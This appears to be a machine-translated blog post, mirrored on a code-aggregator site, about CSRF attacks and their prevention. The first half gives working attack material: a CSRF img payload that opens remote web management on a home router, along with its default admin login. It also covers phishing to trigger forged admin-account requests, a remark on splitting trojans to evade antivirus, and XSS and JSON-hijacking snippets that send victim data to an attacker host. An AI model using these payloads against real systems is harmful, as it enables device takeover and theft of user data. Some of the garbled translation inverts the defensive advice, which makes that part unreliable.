CSRF cross-site forgery request attack-CSRF phishing adds administrator account and security precautions

Others 2020-04-21 23:30:37 views: null

CSRF Phishing adds administrator account and security precautions

table of Contents

Local network device CSRF attack

Under normal circumstances, the external network is not accessible, as is the hardware such as switches. If you want to access the internal network device, what should you do? Note that many internal network devices are the default passwords.
First, log in as a normal user and enter the router to open it. Web management port, and then use burp to capture packets and obtain addresses

	<img
src=http://192.168.1.1/userRpm/ManageControlRpm.htm?port=80&ip=255.255.255.255&Save=
%B1%A3+%B4%E6>

Insert this attack code into the place where you want to insert it, deceive the other party's company to access this address. After accessing, the remote web management port of the other party's device opens
three functions of this attack code. Save as 255.255.255.255.
Note that in the login state, when the attacker visits a web page with a CSRF attack code, he is "forced" to open the "remote
WEB management" function
. The CSRF attack initiated by the GET method, through social workers, etc. The method allows the victim to access the CSRF file of a malicious site.
The default user name and password of WEB management of FAST wireless broadband router: admin.

CSRF no browser case

Embed the attack code into the self-extracting option to
add.
When doing anti-killing, you can also use this function as a self-extracting Trojan to kill the antivirus software.
You can split a Trojan.
First split the registry into the form. Split the
memory part and then split the
boot Split the import form and
finally add an automatic .exe form

burp add administrator account

When the website is open source, find the code for adding an administrator account, simulate the data package for adding an administrator, and then modify it. Just change the address to attack the website, embed it into a malicious program, and trick the administrator into triggering in the management state

summary

The CSRF attack threshold is not very high, but this kind of attack must be based on the session, that is, the victim needs to execute malicious code under the login state, which requires us to combine CSRF with other attack methods to construct the attack code + phishing execution Code

CSRF worm model

There are almost no restrictions on the data obtained by CSRF attacks in the same domain

Several methods for obtaining data from cross-domain CSRF attacks are summarized below

1、XSS

				使用目标站点上的 XSS 漏洞

> <iframe width=0 height=0 src=‘http://目标站点/search.php?k=“><script
> src=http://恶意站点/get.js></script>’></iframe>

The code for http: // malicious site / get.js is:

	//use DOM method to get your data
new Image(). src=‘http://恶意站点/do.php?data=‘+yourdata;

The do.php file of the malicious site receives data such as a unique identifier. The unique identifier may be in the url or
in the content corresponding to the url of the target site .

2. Server agent technology

3、JSON Hijacing

				使用 JSON Hijacking 技术:

The target site uses JSON data to transfer user private data.
The private data contains information such as the unique identification we need.

<script>
					function hijack(o){
					//use DOM method to get your data
					new Image().src="http://192.168.1.2/JSONHiJack.asp?hi="+escape(data);
					}</script>
					<script 
					src=http://api.fanfou.com/private_messages/inbox.json?callback=hijack&count=2></script>

4、Flash AsctionScript(crossdomain.xml)

Use Flash ActionScript scripts. The
crossdomain.xml file must exist under the target site. The configuration in crossdomain.xml allows AS
scripts from other domains to make cross-domain requests
.

The key data to be obtained is a unique identifier

User id, user nickname, user email, user personal page address, etc.

CSRF vulnerability prevention

Server defense

Verify the HTTP Referer field

According to the HTTP protocol, there is a field in the HTTP header called Referer, which records the source
address of the HTTP request . Under normal circumstances, a request to access a security-restricted page must come from the same website

For example, a bank's transfer is completed by the user accessing the http: //bank.test/test? Page = 10 & userID = 101 & money = 10000 page. The user must first log in to bank. Test and then trigger the transfer event by clicking the button on the page.
When the user submits the request, the Referer value of the transfer request will be the URL of the page where the transfer button is located (in this case, it is usually an address that starts with the bank. Test domain name).

If the attacker wants to implement a CSRF attack on the bank's website, he can only construct a request on his website. When the user sends a request to the bank through the attacker's website, the Referer of the request points to the attacker's website. Therefore, to defend against CSRF attacks, the bank website only needs to verify the Referer value for each transfer request. If the domain name starts with bank. Test, the request is from the bank website ’s own request and is legal. If the Referer is another website, it may be a CSRF attack, and the request is rejected.

Add token to request address and verify

The reason why the CSRF attack is successful is because the attacker can forge the user's request, and all the user authentication information in the request is in the cookie, so the attacker can directly use the user's own cookie without knowing the verification information. To pass security verification.

It can be seen that the key to resisting CSRF attacks is to put in the request information that the attacker cannot forge, and that the information does not exist in the cookie . In view of this, the system developer can add a randomly generated token in the form of parameters to the HTTP request, and establish an interceptor on the server to verify the token. If there is no token in the request or the token content is incorrect, it may be considered CSRF attacks and rejects the request.

Customize attributes in the HTTP header and verify

			自定义属性的方法也是使用 token 并进行验证,和前一种方法不同的是,这里并不是把 token

Put it in the HTTP request as a parameter, but put it in a custom attribute in the HTTP header.
Through the XMLHttpRequest class, you can add the csrftoken HTTP header attribute to all requests of this type at once, and put the token value into it. This solves the inconvenience of adding tokens to the request in the previous method. At the same time, the address requested through this class will not be recorded in the browser's address bar, and there is no need to worry that the token will be leaked to other websites through the Referer.

Strictly distinguish between POST and GET data requests in the server area

			如在 asp 中不要使用 Request 来直接获取数据。同时建议不要用 GET 请求来执行持久

Sexual operations, such as: http://www.yeeyan.com/space/deleteEvent/16824.

Confirm with verification code or password

This method is very effective, but the user experience is worse.
For example, to change the password, you must enter the verification code or the original password

User defense

It is unrealistic for ordinary users to learn and possess network security knowledge to defend against network attacks. But if users develop good online habits, they can greatly reduce the harm of CSRF attacks.
The system administrator , the most important user, should try to click on unknown links and pictures when logging out of the system. In addition, users also need to install appropriate security protection software on the computer connected to the Internet, and update the signature database released by the software manufacturer in time to maintain real-time tracking of the latest attacks by security software.

Defense of security equipment

Since it takes a certain time from the discovery of vulnerabilities to the release of patches, and a considerable percentage of manufacturers do not respond positively to the vulnerabilities, and some system administrators do not pay enough attention to system patches. In view of the above circumstances, users can use third-party professional security equipment to strengthen the defense against CSRF loopholes.

The essence of the CSRF attack is that the attacker forged a legal identity to gain access to the system. If you can identify
the fake identity of the visitor , you can also identify the CSRF attack. The research found that some vendors' security products can
check the content of the Referer field of the HTTP header based on the hardware level to quickly and accurately identify CSRF attacks. At present, H3C's IPS products use special technology to support the detection and blocking of CSRF vulnerability attacks of some commonly used systems. The first
method
is to match the network traffic with the signature code of the signature database.

Hit characteristics
Report attack logs

No hits characteristics of
flow release

Gentle Little Xue
Published 117 original articles · won 11 · visited 6466
Private letter concerns

Guess you like

Origin blog.csdn.net/weixin_43079958/article/details/105458267
Recommended
Arc Browser for Windows 1.0 officially GA
A programmer born in the 1990s developed a video porting software and made over 7 million in less than a year. The ending was very punishing!
Ranking
1. Select Sort
Create a thread thread
3 press to play ball that reach 6
Programmation CUDA (4) : gestion de la mémoire
SpringBoot database connection pool Druid error
E Diudiu App redesign summary
4EVERLAND Hosting now supports SNS+IPFS
About HTTPS
[vue3+vite+ts+element-plu+sass] uses bug records in sass
Interpretation of HUAWEI CLOUD GaussDB (for Influx): Best Practice Data Modeling
Daily
More
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)

Code World

© 2018 codetd.com